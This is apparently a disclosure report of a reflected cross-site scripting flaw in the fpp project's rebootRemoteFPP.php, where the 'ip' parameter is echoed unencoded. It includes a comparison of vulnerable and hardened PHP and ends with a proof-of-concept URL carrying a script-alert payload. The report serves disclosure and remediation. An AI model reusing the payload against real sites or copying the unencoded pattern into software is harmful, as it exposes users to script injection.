Cross-site Scripting (XSS) - Reflected in falconchristmas/fpp
Valid
Reported on May 29th 2021
✍️ Description
Hi, in https://github.com/FalconChristmas/fpp/blob/123cdf2eb11062766da333a7a4d85bc0bf620e47/www/rebootRemoteFPP.php#L15
the `ip` query parameter is read from the request and echoed straight into the response without prior validation or output encoding:
$ip = $_GET['ip'];
echo "Rebooting FPP system @ $ip\n";
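For comparison, here is the reflected-parameter pattern quoted above beside a hardened form. This is an added example, not code from the fpp project: the function names and the sample inputs are constructed for illustration, and the only assumption about the original file is what the two quoted lines show (the value of `$_GET['ip']` is interpolated into HTML output).

```php
<?php
declare(strict_types=1);

// Added example, not fpp's own code. Function names are illustrative.

// Vulnerable pattern (mirrors the quoted lines): whatever arrives in the
// `ip` parameter is placed unchanged into the HTML response, so any markup
// the client supplies is rendered and executed by the browser.
function render_vulnerable(array $params): string
{
    $ip = $params['ip'] ?? '';
    return "Rebooting FPP system @ $ip\n";
}

// Accept only an IPv4 or IPv6 literal. FILTER_VALIDATE_IP rejects hostnames,
// angle brackets, quotes and everything else that is not an address.
function validate_ip(string $candidate): ?string
{
    $ip = filter_var($candidate, FILTER_VALIDATE_IP);
    return $ip === false ? null : $ip;
}

// Hardened pattern: validate the input against the expected shape and
// HTML-encode the value on output. Encoding is redundant after strict
// validation, but keeps the response safe if the check is ever loosened.
function render_hardened(array $params): string
{
    $ip = validate_ip((string) ($params['ip'] ?? ''));
    if ($ip === null) {
        // Callers in a web context should also send a 4xx status here.
        return "Rebooting FPP system: invalid ip parameter\n";
    }
    $safeIp = htmlspecialchars($ip, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return "Rebooting FPP system @ $safeIp\n";
}

if (PHP_SAPI === 'cli') {
    // Constructed sample requests: one benign address, one value that is not an IP.
    $samples = [
        ['ip' => '192.168.1.20'],
        ['ip' => '<b>not-an-ip</b>'],
    ];
    foreach ($samples as $query) {
        echo 'vulnerable: ' . render_vulnerable($query);
        echo 'hardened:   ' . render_hardened($query);
    }
}
```

Run with `php example.php`: the vulnerable function emits the `<b>` markup verbatim, while the hardened one rejects the second sample before it reaches the output at all. Validating against the expected shape (an IP address) is the stronger control here, because the parameter is presumably also used to reach another host, and output encoding alone would not constrain that use.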
🕵️‍♂️ Proof of Concept
Visit: http://127.0.0.1/rebootRemoteFPP.php?ip=%3Cscript%3Ealert(%27zer0h%27)%3C/script%3E
💥 Impact
XSS